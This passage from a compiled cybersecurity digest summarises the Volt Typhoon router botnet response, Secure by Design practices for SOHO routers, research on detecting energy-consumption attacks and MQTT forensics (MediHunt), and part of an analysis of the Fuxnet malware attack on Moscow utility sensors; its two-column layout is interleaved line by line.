presence on target networks and exploit sensitive vulnerabilities being exploited by Volt Typhoon actors.
information. Efforts were made to analyze the malicious firmware,
understand the exploitation techniques, and develop
• FBI's Response to Chinese Malware: The FBI has patches to address the vulnerabilities.
taken proactive measures to disrupt the activities of
Chinese hackers, specifically targeting SOHO routers • Disruption Operations: Law enforcement and
infected with the KV Botnet malware. This involved cybersecurity agencies undertook operations to disrupt
issuing covert commands to infected devices to remove the Volt Typhoon campaign. This included identifying
the malware and prevent further access by the hackers, and taking down C2 servers, removing malicious
highlighting the ongoing efforts to counteract the threats firmware from compromised routers, and blocking
posed by compromised SOHO routers. traffic to known malicious IP addresses.
1) Tactics and Techniques • Global Notification and Mitigation Campaign: A
• KV Botnet Malware: Volt Typhoon actors have global campaign was launched to notify owners of
implanted KV Botnet malware into end-of-life Cisco and compromised SOHO routers and provide them with
guidance on mitigating the threat. This included

50
 Read more: Boosty | Sponsr | TG

instructions for resetting devices to factory settings, • Interconnectedness of Devices: The proliferation of IoT
updating firmware, and changing default passwords. devices and the interconnectedness of digital ecosystems
have amplified the potential impact of compromised
• Disruption of Critical Infrastructure: The devices, making security a top priority for ensuring the
exploitation of these routers poses a significant threat as integrity of personal and corporate data.
it could potentially disrupt essential services provided
by critical infrastructure sectors. b) Customer Expectations
• Federal Response: The FBI and the Justice Department • Built-in Security Features: Customers now expect
have conducted operations to disrupt the KV Botnet by devices to come with robust, built-in security features that
remotely deleting the malware from infected routers and protect against a wide range of threats without requiring
taking steps to sever their connection to the botnet. extensive technical knowledge to configure.
• Mitigation Efforts: The FBI has been notifying owners • Regular Security Updates: There is an expectation for
or operators of SOHO routers that were accessed during manufacturers to provide regular and timely security
the takedown operation. The mitigation steps authorized updates to address new vulnerabilities as they are
by the court are temporary, and a router restart without discovered.
proper mitigation will leave the device vulnerable to
reinfection. • Transparency: Customers demand transparency from
manufacturers regarding the security of their products,
• Secure by Design: CISA and the FBI urge SOHO router including clear information about known vulnerabilities
manufacturers to build security into the design, and the steps being taken to address them.
development, and maintenance of SOHO routers to
eliminate the paths these threat actors take to • Ease of Use: While demanding high levels of security,
compromise devices and critical infrastructure entities. customers also expect these features to be user-friendly
• Transparency and Disclosure: Manufacturers are and not to impede
encouraged to protect against Volt Typhoon activity and 4) Manufacturer Responsibility
other cyber threats by disclosing vulnerabilities through
the CVE program and accurately classifying them using a) Core Elements of Secure by Design
the CWE system. • Security as a Foundational Requirement: Security
must be considered a primary requirement, akin to
• User Vigilance: Device operators are advised to update functionality, usability, and performance. This means
software, harden configurations, and add security integrating security considerations into the product
solutions where necessary to combat threats design, development lifecycle, and architectural
3) Public and Customer Demand for Security decisions.
In today's digital age, the security of network devices has • Minimization of Attack Surfaces: Reducing the
become a paramount concern for both the public and businesses number of potential points of attack within a system
alike. This heightened awareness stems from an increasing that involves limiting the functionality and access
number of high-profile cyberattacks and data breaches, which rights of the system to only what is necessary for its
have underscored the vulnerabilities inherent in connected operation.
devices. As a result, there is a growing demand from customers • Default Secure Settings: Products should ship with
and the public for manufacturers to prioritize security in their secure settings by default, requiring users to make
products. conscious decisions to weaken security. This includes
a) Factors Driving Demand strong default passwords, disabled unnecessary
services, and enabled encryption.
• Increased Awareness of Cyber Threats: The general
public and businesses are becoming more aware of the • Principle of Least Privilege: Ensuring that processes,
risks associated with cyber threats, including the potential users, and systems operate using the minimum set of
for financial loss, privacy breaches, and disruption of privileges necessary to perform their tasks. This limits
services. the potential damage from an exploit or breach.
• Regulatory Pressure: Governments and regulatory • Secure Failure: Designing systems to fail securely in
bodies worldwide are implementing stricter regulations the event of a compromise. This means that when a
and standards for cybersecurity, compelling system encounters an error or breach, it defaults to a
manufacturers to enhance the security features of their state that minimizes risk and exposure.
products.
• Security Through Transparency: Encouraging
• Economic Impact of Cyberattacks: The economic openness about the design and implementation of
repercussions of cyberattacks, including the cost of security features, allowing for public scrutiny and peer
recovery and the impact on brand reputation, have made review. This transparency helps identify and rectify
security a critical consideration for customers when vulnerabilities more effectively.
selecting products.

51
 Read more: Boosty | Sponsr | TG

• Privacy by Design: Integrating privacy considerations • Building Trust: By prioritizing security,

into product development, ensuring that user data is manufacturers can build trust with customers,
protected and handled responsibly. differentiating their products in a competitive market.
b) Implementing Secure by Design in SOHO Routers • Engaging with Customers: Actively engaging with
• Automatic Updates: Implementing mechanisms for customers to understand their security concerns and
automatic firmware updates to ensure that routers are providing clear, accessible information on how to
always running the latest version with the most recent secure their devices.
security patches. This reduces the reliance on users to • Global Supply Chain: routers are often produced as
manually update their devices. part of a complex global supply chain. Ensuring
• Digital Signing: Ensuring that updates are digitally security across this chain, from component
signed to verify their authenticity and integrity. This manufacturers to final assembly, requires coordination
prevents the installation of malicious firmware updates and adherence to security best practices at every stage.
that could compromise the router. • Industry Collaboration: Working with industry peers,
• Secure Web Management Interface: Placing the web security organizations, and regulatory bodies to
management interface on LAN-side ports and improving establish and adhere to security best practices.
its security to allow safe usage when exposed to the E. Consequences
public internet.
• Widespread Vulnerabilities: A significant number of
• Secure Defaults: Shipping routers with secure vulnerabilities, some 226 in total, collectively pose a
configurations by default, such as strong, unique substantial security risk.
passwords, and disabled unnecessary services while users
should be warned against insecure configurations. • Outdated Components: Core components such as the
Linux kernel and additional services like VPN or
• Access Controls: Restricting access to the router's web multimedia software in these routers are often outdated,
management interface from the LAN side by default and making them susceptible to known exploits.
providing options to securely enable remote management
if needed. • Default Passwords and Unencrypted Connections:
Many routers come with easy-to-guess default passwords
• Encryption: Utilizing strong encryption for the web and use unencrypted connections, which can be easily
management interface to protect communications exploited by attackers.
between the router and the user.
• Compromised Devices and Data: Once a router is
• Authentication: Implementing strong authentication compromised, all devices protected by its firewall
mechanisms, including the option for MFA, to secure become vulnerable, allowing attackers to monitor,
access to the router's management interface. redirect, block, or tamper with data.
• Vulnerability Disclosure and Patching: Establishing a • Risk to Critical Infrastructure: Compromised routers
clear, responsible disclosure policy for vulnerabilities and can be used to attack critical infrastructure, potentially
providing timely patches. This includes participating in disrupting essential services in communications, energy,
the CVE program to track and disclose vulnerabilities. transportation, and water sectors.
• End-of-Life Support: Clearly communicating the end- • DoS and Traffic Interception: Vulnerabilities in
of-life (EOL) policy for products and providing support protocols can lead to denial-of-service attacks against
and updates throughout the product's lifecycle are critical. host services and interception of both internal and
For devices that are no longer supported, manufacturers external traffic.
should offer guidance on secure disposal or replacement.
• Eavesdropping and attacks: Attackers can eavesdrop
c) Challenges and Considerations on traffic and launch further network-based attacks,
• Balancing Security and Usability: One of the making it difficult for users to detect a breach due to
challenges is maintaining user-friendliness. Security minimal router user interfaces.
measures should not overly complicate the user • Potential for Large-Scale Exploitation: The sheer
experience. number of vulnerable devices, estimated in the millions,
• Cost Implications: Developing secure products can indicates a significant potential for widespread
incur additional costs. However, the long-term benefits exploitation by malicious actors.
of reducing the risk of breaches and attacks justify • Legal and Technical Challenges: Identifying specific
these investments. vulnerable devices is complex due to legal and technical
• Continuous Evolution: Security is not a one-time issues, which complicates the process of mitigating these
effort but requires ongoing attention to adapt to new vulnerabilities.
threats and vulnerabilities.

52
 Read more: Boosty | Sponsr | TG

DETECTION OF ENERGY
CONSUMPTION CYBER
ATTACKS ON SMART
DEVICES

53
 Read more: Boosty | Sponsr | TG

devices and considers three different protocols: TCP,

UDP, and MQTT.
• Packet Reception Rate Analysis: The detection
technique relies on analyzing the packet reception rate
of smart devices to identify abnormal behavior
indicative of energy consumption attacks.
B. Benefits and drawbacks
These benefits and drawbacks provide a balanced view of
the proposed detection framework's capabilities and limitations,
highlighting its potential for improving smart home security.
1) Benefits
• Lightweight Detection Algorithm: The proposed
algorithm is designed to be lightweight, making it
suitable for resource constrained IoT devices. This
ensures that the detection mechanism does not overly
burden the devices it aims to protect.
• Protocol Versatility: The algorithm considers multiple
communication protocols (TCP, UDP, MQTT),
enhancing its applicability across various types of smart
devices and network configurations.
Abstract – The paper "Detection of Energy Consumption Cyber • Two-Stage Detection Approach: The use of a two-
Attacks on Smart Devices" highlights the growing integration of IoT stage detection approach (short and long-time
technology in smart homes and the associated security challenges windows) improves the accuracy of detecting energy
due to resource constraints and unreliable networks. It presents a consumption attacks while minimizing false positives.
lightweight technique for detecting energy consumption attacks by This method allows for both quick initial detection and
analyzing received packets, considering TCP, UDP, and MQTT detailed analysis.
protocols, and promptly alerting administrators upon detecting • Real-Time Alerts: The framework promptly alerts
abnormal behavior, effectively identifying such attacks through administrators upon detecting an attack, enabling quick
packet reception rate measurements.
response and mitigation of potential threats.
A. Introduction • Effective Anomaly Detection: By measuring packet
The paper "Detection of Energy Consumption Cyber reception rates and analyzing energy consumption
Attacks on Smart Devices" emphasizes the rapid integration of patterns, the algorithm effectively identifies deviations
IoT technology into smart homes, highlighting the associated from normal behavior, which are indicative of
security challenges due to resource constraints and unreliable cyberattacks.
networks. 2) Drawbacks
• Energy Efficiency: it emphasizes the significance of • Limited Attack Scenarios: The experimental setup has
energy efficiency in IoT systems, particularly in smart tested only specific types of attacks, which limit the
home environments for comfort, convenience, and generalizability of the results to other potential attack
security. vectors not covered in the study.
• Vulnerability: it discusses the vulnerability of IoT • Scalability Concerns: While the algorithm is designed
devices to cyberattacks and physical attacks due to their to be lightweight, its scalability in larger, more complex
resource constraints. It underscores the necessity of smart home environments with numerous devices and
securing these devices to ensure their effective varied network conditions may require further
deployment in real-world scenarios. validation.
• Proposed Detection Framework: The authors propose • Dependency on Baseline Data: The effectiveness of
a detection framework based on analyzing the energy the detection mechanism relies on accurate baseline
consumption of smart devices. This framework aims to measurements of packet reception rates and energy
classify the attack status of monitored devices by consumption. Any changes in the normal operating
examining their energy consumption patterns. conditions of the devices could affect the baseline,
• Two-Stage Approach: The methodology involves a potentially leading to false positives or negatives.
two-stage approach. The first stage uses a short time • Resource Constraints: Despite being lightweight, the
window for rough attack detection, while the second algorithm still requires computational resources, which
stage involves more detailed analysis. might be a challenge for extremely resource-limited
• Lightweight Algorithm: The paper introduces a devices. Continuous monitoring and analysis could also
lightweight algorithm designed to detect energy impact the battery life and performance of these
consumption attacks on smart home devices. This devices.
algorithm is tailored to the limited resources of IoT

54
 Read more: Boosty | Sponsr | TG

C. Proposed Algorithm • Attack Scenarios: The authors simulated different

It highlights the role of machine learning (ML) algorithms types of energy consumption attacks, such as Denial of
in intrusion detection systems (IDS) and the challenges Service (DoS), Distributed Denial of Service (DDoS),
associated with their deployment on resource constrained IoT and energy consumption-based DDoS (EC-DDoS)
devices. It reviews existing studies on ML-based IDS, attacks, to evaluate the proposed detection framework's
effectiveness.
emphasizing the need for on-device ML models to reduce
• Baseline Measurements: Baseline packet reception
latency and enhance data privacy, and sets the stage for the
rates (PRRs) and energy consumption levels were
proposed comparative analysis of energy consumption in established for the smart devices under normal
different ML deployment scenarios. operating conditions to serve as a reference for
1) Packet Measurements detecting anomalies.
• Packet Reception Rate (PRR): The section discusses • Performance Metrics: The experimental setup
the use of Packet Reception Rate (PRR) as a key metric included the definition of performance metrics, such as
for detecting energy consumption attacks. PRR is detection accuracy, false positive rate, and
defined as the ratio of successfully received packets to computational overhead, to assess the algorithm's
the total number of packets sent over a network. effectiveness.
• Protocol Consideration: The algorithm considers
different communication protocols, including TCP, 2) Results and Analysis
UDP, and MQTT, to measure PRR. Each protocol has • Packet Reception Rate Analysis: The results section
unique characteristics that affect packet transmission analyzes the changes in packet reception rates (PRRs)
and reception. observed during the simulated attacks, demonstrating
• Abnormal Behavior Detection: By monitoring the the algorithm's ability to detect deviations from normal
PRR, the algorithm can identify deviations from normal behavior.
behavior, which may indicate the presence of an attack. • Energy Consumption Analysis: The paper presents an
A significant drop in PRR can be a sign of an ongoing analysis of the energy consumption patterns of the
energy consumption attack. smart devices, highlighting the algorithm's capability to
identify abnormal energy usage indicative of attacks.
2) Energy Measurements • Two-Stage Approach Evaluation: The authors
• Energy Consumption Analysis: This section focuses evaluate the effectiveness of the proposed two-stage
on analyzing the energy consumption patterns of smart approach, which uses a short time window for initial
devices to detect anomalies. The algorithm measures rough detection and a longer time window for detailed
the energy consumed by devices over time and analysis, in improving detection accuracy and reducing
compares it to expected consumption levels. false positives.
• Short and Long Time Windows: The proposed • Protocol-Specific Observations: The results may
method uses a two-stage approach with short and long- include observations specific to the different
time windows. The short time window is used for communication protocols (TCP, UDP, MQTT) used in
initial, rough detection of potential attacks, while the the experiments, discussing their impact on packet
long-time window provides a more detailed analysis to reception rates and energy consumption patterns during
confirm the presence of an attack. attacks.
• Detection of Specific Attacks: The energy • Performance Evaluation: The authors present an
measurements help in identifying specific types of evaluation of the algorithm's performance based on the
attacks, such as Denial of Service (DoS) or Distributed defined metrics, such as detection accuracy, false
Denial of Service (DDoS) attacks, by detecting unusual positive rate, and computational overhead, comparing it
spikes or drops in energy consumption. to existing techniques or baselines.
D. Experiments E. Conclusion
The experiments were conducted in a simulated smart home It emphasizes the effectiveness of the proposed lightweight
environment with various IoT devices, and different types of detection framework in identifying energy consumption
energy consumption attacks were simulated to evaluate the cyberattacks on smart devices, highlighting its high detection
proposed detection framework. The results show that the accuracy and low false positive rate. The section also discusses
Decision Tree (DT) algorithm deployed on-device offers better the scalability and efficiency of the framework in real-world
performance in terms of inference time and power consumption smart home environments and suggests several future research
compared to other ML models. directions.
1) Experimental Setup • Summary of Findings: It highlights the successful use
• Smart Home Testbed: The experiments were of packet reception rate (PRR) and energy consumption
conducted in a simulated smart home environment patterns to detect anomalies.
consisting of various IoT devices like smart lights,
security cameras, and smart speakers communicating • Algorithm Performance: The authors emphasize the
over different protocols (TCP, UDP, MQTT). high detection accuracy and low false positive rate

55
 Read more: Boosty | Sponsr | TG

achieved by the two-stage detection approach, which importance of protecting IoT devices from energy
uses both short and long time windows for analysis. consumption attacks to ensure the reliability and safety
of smart homes.
• Scalability and Efficiency: The framework's scalability
and efficiency in real-world smart home environments • Comparison with Existing Techniques: The authors
are discussed, noting its suitability for resource compare their approach with existing anomaly detection
constrained IoT devices. techniques, highlighting the advantages of their
lightweight, two-stage method in terms of accuracy,
• Future Research Directions: The authors suggest efficiency, and suitability for resource-limited devices.
several future research directions, including:
• Challenges and Limitations: The discussion
o Extending the framework to cover a broader range acknowledges the challenges and limitations
of attack types and smart devices. encountered during the study, such as the need for
o Enhancing the algorithm to improve detection continuous model updates to adapt to evolving attack
speed and reduce computational overhead. patterns and the potential impact of network conditions
on detection performance.
o Investigating the integration of additional data
sources, such as network traffic and device behavior • Practical Applications: The potential practical
logs, to enhance detection capabilities. applications of the detection framework are explored,
including its deployment in commercial smart home
o Exploring the use of advanced machine learning systems and its integration with existing security
techniques to further improve the accuracy and solutions to provide comprehensive protection against
robustness of the detection framework. cyberattacks.
• Implications for Smart Home Security: The
discussion section elaborates on the implications of the
proposed detection framework for enhancing the
security of smart home environments. It underscores the

56
 Read more: Boosty | Sponsr | TG

MEDIHUNT

57
 Read more: Boosty | Sponsr | TG

• Real-time Attack Detection: MediHunt is designed to

detect network flow-based traffic attacks in real-time,
which is crucial for mitigating potential damage and
ensuring the security of MIoT environments.
• Comprehensive Forensic Capabilities: The
framework provides a complete solution for data
collection, analysis, attack detection, presentation, and
preservation of evidence. This makes it a robust tool for
network forensics in MIoT environments.
• Machine Learning Integration: By leveraging
machine learning models, MediHunt enhances its
detection capabilities. The use of a custom dataset that
includes flow data for both TCP/IP layer and
application layer attacks allows for more accurate and
effective detection of a wide range of cyber-attacks.
• High Performance: The framework has demonstrated
high performance, with F1 scores and detection
accuracy exceeding 0.99 and indicates that it is highly
reliable in detecting attacks on MQTT networks.
• Resource Efficiency: Despite its comprehensive
capabilities, MediHunt is designed to be resource-
efficient, making it suitable for deployment on
Abstract – The paper "MediHunt: A Network Forensics Framework
for Medical IoT Devices" presents the development of MediHunt
resource-constrained MIoT devices like Raspberry Pi.
framework designed for real-time detection of network flow-based 2) Drawbacks
traffic attacks in MQTT networks, which are commonly used in • Dataset Limitations: While MediHunt uses a custom
smart hospital environments. MediHunt can detect a variety of
dataset for training its machine learning models, the
TCP/IP layers and application layer attacks on MQTT networks by
creation and maintenance of such datasets can be
leveraging machine learning models. The framework aims to
enhance the forensic analysis capabilities in MIoT environments,
challenging. The dataset needs to be regularly updated
ensuring effective tracing and mitigation of malicious activities. to cover new and emerging attack scenarios.
• Resource Constraints: Although MediHunt is
A. Introduction designed to be resource-efficient, the inherent
The paper "MediHunt: A Network Forensics Framework for limitations of MIoT devices, such as limited
Medical IoT Devices" addresses the need for robust network computational power and memory, can still pose
forensics in Medical Internet of Things (MIoT) environments, challenges. Ensuring that the framework runs smoothly
particularly focusing on MQTT (Message Queuing Telemetry on these devices without impacting their primary
Transport) networks. These networks are commonly used in functions can be difficult.
smart hospital environments for their lightweight • Complexity of Implementation: Implementing and
communication protocol. It highlights the challenges in maintaining a machine learning-based network
securing MIoT devices, which are often resource-constrained forensics framework can be complex. It requires
and have limited computational power. The lack of publicly expertise in cybersecurity and machine learning, which
available flow-based MQTT-specific datasets for training may not be readily available in all healthcare settings.
attack detection systems is mentioned as a significant challenge. • Dependence on Machine Learning Models: The
effectiveness of MediHunt heavily relies on the
The paper presents MediHunt as an automatic network accuracy and robustness of its machine learning
forensics solution designed for real-time detection of network models. These models need to be trained on high-
flow-based traffic attacks in MQTT networks. It aims to quality data and regularly updated to remain effective
provide a comprehensive solution for data collection, analysis, against new types of attacks.
attack detection, presentation, and preservation of evidence. It
• Scalability Issues: While the framework is suitable for
is designed to detect a variety of TCP/IP layers and application
small-scale deployments on devices like Raspberry Pi,
layer attacks on MQTT networks. It leverages machine learning
scaling it up to larger, more complex MIoT
models to enhance the detection capabilities and is suitable for
environments may present additional challenges.
deployment on resource constrained MIoT devices.
Ensuring consistent performance and reliability across
The primary objective of the MediHunt is to strengthen the a larger network of devices can be difficult
forensic analysis capabilities in MIoT environments, ensuring
C. MediHunt vs other frameworks
that malicious activities can be traced and mitigated effectively.
MediHunt stands out among network forensics frameworks,
B. Benefits and drawbacks of proposed solution particularly in the context of Medical Internet of Things (MIoT)
1) Benefits environments, due to its specialized focus, performance, and
accuracy. When comparing MediHunt to other network

58
 Read more: Boosty | Sponsr | TG

forensics frameworks, several key aspects highlight its The section emphasizes the unique challenges faced in
distinctiveness and effectiveness: Medical Internet of Things (MIoT) forensics. One of the
primary challenges is the resource constraints of MIoT devices,
• Specialized Focus on MIoT: Unlike many network which often have limited computational power, memory, and
forensics frameworks, MediHunt is specifically storage capabilities. This makes it difficult to implement
designed for the MIoT domain. This specialization traditional forensic tools and techniques. Additionally, there is
allows it to address the unique challenges and a significant lack of comprehensive datasets for training
requirements of medical IoT devices, such as resource machine learning models, which are crucial for effective attack
constraints and the need for real-time attack detection. detection and forensic analysis. The heterogeneity of MIoT
• Real-time Attack Detection: MediHunt's capability to devices, with their varied operating systems, communication
detect attacks in real-time is a significant advantage. protocols, and data formats, complicates the forensic process.
This feature is crucial for MIoT environments where
timely detection can prevent potential harm to patients 3) Comparison with Traditional Forensics
and healthcare operations. MediHunt's implementation A comparison is made between traditional digital forensics
is tailored to the lightweight nature of MIoT devices, and IoT forensics. Traditional digital forensics typically deals
ensuring minimal impact on device performance. with well-defined and homogeneous environments, such as
• Performance and Accuracy: MediHunt demonstrates personal computers and servers, where standard tools and
exceptional performance and accuracy in detecting techniques can be effectively applied. In contrast, IoT forensics
network attacks. With F1 scores and detection accuracy must contend with a highly heterogeneous and resource-
exceeding 0.99, it surpasses many existing frameworks constrained environment. Conventional forensic tools are often
in its ability to accurately identify malicious activities inadequate for IoT systems, which require specialized
without a high rate of false positives. This level of approaches to handle the diverse and dynamic nature of IoT
accuracy is particularly important in healthcare settings, devices and networks.
where false alarms can have serious implications.
4) Use of Machine Learning
• Resource Efficiency: Despite its comprehensive
The section discusses the application of machine learning
capabilities, MediHunt is designed to be resource-
(ML) techniques in network forensics, particularly for detecting
efficient, making it suitable for deployment on
and analyzing network traffic anomalies. Machine learning
resource-constrained MIoT devices. This contrasts with
offers significant potential for improving the accuracy and
some other frameworks that may require more
efficiency of forensic investigations by identifying patterns and
substantial computational resources, making them less
anomalies in network traffic that may indicate malicious
viable for deployment in MIoT scenarios.
activity. However, the effectiveness of ML models depends
• Machine Learning Integration: MediHunt leverages heavily on the availability of high-quality datasets that cover a
machine learning models to enhance its attack detection wide range of attack scenarios. The need for specific datasets
capabilities. While other frameworks also use machine tailored to the characteristics of MQTT-based IoT systems is
learning, MediHunt's approach is specifically tuned for particularly highlighted.
the types of attacks prevalent in MIoT networks, using
a custom dataset that includes flow data for both 5) Existing Datasets
TCP/IP layer and application layer attacks. A review of existing datasets used for training machine
• Dataset and Model Training: The custom dataset for learning models in network forensics is provided. These
training machine learning models is another aspect datasets are critical for developing and validating ML models,
where MediHunt stands out. Many frameworks struggle but they often have limitations in terms of diversity and
with the lack of comprehensive datasets for training, comprehensiveness. Many existing datasets do not adequately
especially in the context of MIoT. MediHunt addresses represent the variety of attack scenarios that can occur in
this gap by leveraging a dataset that covers a wide range MQTT-based IoT systems, which limits the effectiveness of the
of attack scenarios relevant to MIoT environments trained models. The section underscores the importance of
developing more comprehensive and representative datasets to
D. Related Work improve the performance of ML-based forensic tools.
1) Overview of Existing Forensic Frameworks
. This review highlights the strengths and limitations of 6) Gap in Literature
existing network forensic frameworks and their applications Finally, the section identifies gaps in the current literature
across different domains. For instance, traditional digital on MIoT forensics. One of the key gaps is the need for real-time
forensics frameworks are well-established and have been attack detection capabilities, which are essential for promptly
extensively used in various contexts, but they often fall short identifying and mitigating threats in MIoT environments.
when applied to the unique and complex environments of IoT Additionally, there is a need for improved methods for
systems. The frameworks discussed include those that focus on preserving forensic evidence, ensuring that it remains intact and
device forensics, network forensics, and cloud forensics, each admissible in legal proceedings. Addressing these gaps is
with its own set of methodologies and tools designed to address crucial for advancing the field of MIoT forensics and enhancing
specific forensic challenges. the security and reliability of medical IoT systems.

2) Challenges in MIoT Forensics

59
 Read more: Boosty | Sponsr | TG

E. Proposed Network Forensics Framework • Dataset Generation: The collected data is processed to
• Framework Design: MediHunt is designed to address generate a dataset that can be used for training machine
the specific challenges of network forensics in MIoT learning models. This dataset includes labeled instances
environments, particularly focusing on the MQTT of both normal and attack traffic.
protocol. It aims to detect attacks in real-time and 2) ML Model Training and Performance Analysis
preserve the necessary logs for forensic analysis. • Machine Learning Models: Six different models are
• Real-time Attack Detection: Capability to detect evaluated, including decision trees, random forests,
cyber-attacks as they happen is crucial for mitigating support vector machines, and neural networks.
potential damage and for the immediate initiation of • Training Process: The training process involves using
forensic analysis. the generated dataset to train the machine learning
• Log Storage Mechanism: Given the memory models. The models are trained to recognize patterns in
constraints of MIoT devices, MediHunt incorporates an the data that indicate normal or attack traffic.
efficient log storage mechanism. It ensures that logs • Performance Metrics: The performance of the trained
relevant to detected attacks are stored for further models is evaluated using metrics such as F1 score and
analysis without overwhelming the storage capacity. detection accuracy that provide a quantitative measure
• Machine Learning Integration: MediHunt leverages of the models' effectiveness in detecting attacks.
ML techniques to enhance its attack detection • High Performance: achieved with F1 scores and
capabilities. It utilizes a custom dataset that includes detection accuracy exceeds 0.99 that indicates the
flow data for both TCP/IP layer and application layer highly effectiveness in detecting attacks in real-time.
attacks, addressing the lack of datasets for MQTT-
• Real-Time Detection: the trained models are
based IoT systems.
integrated into the MediHunt framework to enable real-
• Dataset and Model Training: The custom dataset used time detection of attacks. This allows for immediate
in MediHunt covers a wide range of attack scenarios, response and mitigation of potential threats.
enabling the training of ML models to recognize
various types of cyber-attacks. Six different ML models G. Evaluation on Raspberry Pi
were trained and evaluated for their effectiveness in • Implementation on Raspberry Pi: The authors
real-time attack detection. analyzed the performance of machine learning (ML)
• Performance Metrics: MediHunt’s effectiveness is algorithms on Raspberry Pi 3B models to implement
quantitatively measured using F1 scores and detection the MediHunt network forensics framework on
accuracy and achieved high performance exceeding resource limited MIoT devices.
0.99, indicating its reliability in detecting attacks on • Comparable Inference and Training Times: The
MQTT networks. evaluation revealed that the inference and training times
• Comprehensive Forensic Analysis: Beyond attack of the ML algorithms were comparable on the
detection, MediHunt facilitates a comprehensive Raspberry Pi devices. Specifically, the inference time
forensic analysis process. It supports the collection, on the cloud platform was around 2ms, while on the
analysis, presentation, and preservation of digital Raspberry Pi, it was 0.17ms.
evidence, adhering to principles of network forensics. • Lightweight Intrusion Detection System: MediHunt
• Resource Efficiency: MediHunt is designed to be is described as a lightweight intrusion detection system
resource-efficient, making it suitable for deployment on solution that can be readily deployed on resource
resource-constrained MIoT devices. constrained MIoT devices like Raspberry Pis.
F. ML model training • Real-time Attack Detection: The framework's ability
to detect attacks in real-time is highlighted, enabling
1) MQTT Network Traffic Data Collection immediate response and mitigation of potential threats.
• Types of Data Collected: The data collected includes • Efficient Resource Utilization: Despite its
both normal and attack traffic. This ensures that the comprehensive capabilities for network forensics, the
dataset is comprehensive and can be used to train MediHunt framework is designed to be resource-
machine learning models effectively. efficient, making it suitable for deployment on
• Flow-Based Data: collecting flow-based data includes resource-constrained MIoT devices like Raspberry Pis.
information about the communication flows between
devices. This type of data is crucial for detecting
anomalies and attacks in network traffic.
• Attack Scenarios: various attack scenarios are
simulated to generate attack traffic and include TCP/IP
and application layer attacks specific to the MQTT.

60
Read more: Boosty | Sponsr | TG

61
 Read more: Boosty | Sponsr | TG

SECTION:
RESEARCH

62
Read more: Boosty | Sponsr | TG

FUXNET

63
 Read more: Boosty | Sponsr | TG

Regarding the infection methods, the Fuxnet malware

appears to have been designed to target sensor-gateways and
potentially disable them, as well as to fuzz sensors, which could
lead to their malfunction or destruction.
The destruction of these gateways and the fuzzing of sensors
could have serious implications for the monitoring and control
of various systems, potentially leading to a loss of operational
visibility and control for the affected infrastructure.
The key takeaways from the analysis of the Fuxnet malware
and including results of Team82 and Claroty, are as follows:
• Unverified Claims: Team82 and Claroty have not been
able to confirm the claims made by the Blackjack group
regarding the impact of their cyberattack on the
government's emergency response capabilities or the
extent of the damage caused by the Fuxnet malware.
• Discrepancy in Reported Impact: The Blackjack
group initially claimed to have targeted 2,659 sensor-
gateways, with about 1,700 being successfully attacked.
However, Team82's analysis of the data leaked by
Blackjack suggests that only a little more than 500
Abstract –This document presents a comprehensive analysis of the sensor gateways were actually impacted by the malware.
Fuxnet malware, attributed to the Blackjack hacking group, which The claim of having destroyed 87,000 sensors was also
has reportedly targeted infrastructure. The analysis delves into clarified by Blackjack, stating that they disabled the
various aspects of the malware, including its technical specifications, sensors by destroying the gateways and using M-Bus
impact on systems, defense mechanisms, propagation methods, fuzzing, rather than physically destroying the sensors.
targets, and the motivations behind its deployment. By examining
these facets, the document aims to provide a detailed overview of • M-Bus Fuzzing: The Blackjack group utilized a
Fuxnet's capabilities and its implications for cybersecurity. dedicated M-Bus fuzzer within the Fuxnet malware's
code to fuzz the sensors. This technique was aimed at
The document offers a qualitative summary of the Fuxnet malware, disabling the sensors, but the exact number of sensors
based on the information publicly shared by the attackers and that were "fried" or permanently damaged as a result of
analyzed by cybersecurity experts. This analysis is invaluable for this fuzzing is unknown due to the network being taken
security professionals, IT specialists, and stakeholders in various down and access to the sensor-gateways being disabled.
industries, as it not only sheds light on the technical intricacies of a
sophisticated cyber threat but also emphasizes the importance of • Lack of Direct Evidence: Direct evidence to confirm
robust cybersecurity measures in safeguarding critical the extent of the damage or the impact on emergency
infrastructure against emerging threats. Through this detailed detection and response capabilities is lacking (including
examination, the document contributes to the broader understanding targeted Moscollector).
of cyber warfare tactics and enhances the preparedness of
organizations to defend against similar attacks in the future. • Clarification from Blackjack: Following the
publication of Team82's initial analysis, the Blackjack
A. Introduction group reached out to provide updates and clarifications,
The Blackjack hacking group, purportedly linked to particularly challenging the contention that only around
Ukrainian intelligence services, has claimed responsibility for a 500 sensor-gateways had been impacted. They
cyberattack that allegedly compromised emergency detection emphasized that the JSON files made public were only
and response capabilities in Moscow and its surrounding areas. a sample of the full extent of their activity.
This group has been associated with previous cyberattacks B. Affected Industries and Potential Consequences
targeting internet providers and military infrastructure. Their
most recent claim involves an attack on Moscollector, a 1) Affected Industries:
company responsible for constructing and monitoring • Utility Services: The primary target of the Fuxnet
underground water, sewage, and communications infrastructure. malware was the utility sector, specifically the sensor
gateways that manage water and sewage systems. This
The group has disseminated detailed information about this could have implications for the delivery and monitoring
attack on the website ruexfil.com, including the use of Fuxnet of these essential services.
malware to disrupt the Moscollector network operations center.
They have published screenshots of monitoring systems, • Emergency Services: The group claimed to have
servers, and databases they assert have been erased and made gained access to 112 emergency service number, which
inoperative and additionally password dumps. could impact the ability to respond to emergencies
effectively.

64
 Read more: Boosty | Sponsr | TG

• Transportation: The group also claimed to have 3) Deletion of Servers and Databases
bricked sensors and controllers in critical infrastructure, The attackers claim to have deleted servers, workstations,
including airports and subways, which could disrupt and databases, wiping out approximately 30 TB of data,
transportation services and safety. including backup drives. This kind of data destruction could lead
to a loss of historical data, disrupt ongoing operations, and
• Energy: Gas pipelines were mentioned as another complicate recovery efforts.
target, indicating a potential risk to energy distribution
and monitoring systems. 4) Invalidation of Moscollector Office Building Access
All keycards to the office building have reportedly been
2) Potential Consequences: invalidated. This action could prevent employees from accessing
• Disruption of Services: The destruction or malfunction their workplace, further hindering any attempts to assess the
of sensor gateways could lead to a disruption of the damage or initiate recovery protocols.
monitoring and control systems for utilities, potentially
causing service outages or failures. 5) Password Dumping
The dumping of passwords from multiple internal services
• Compromised Safety: In transportation and energy has also been claimed. This could allow unauthorized access to
sectors, the loss of sensor functionality could pose safety various systems and data, exacerbating the breach's impact and
risks, as these sensors are often critical for detecting potentially leading to further exploitation.
hazardous conditions.
D. Attack’s Equipment
• Economic Impact: The potential downtime and repair
costs associated with replacing or reflashing damaged The attack's focus was on the communication gateways that
sensor gateways could have significant economic serve as critical nodes in the data transmission from the sensors
repercussions for the affected industries. to the global monitoring systems. These sensors are integral to
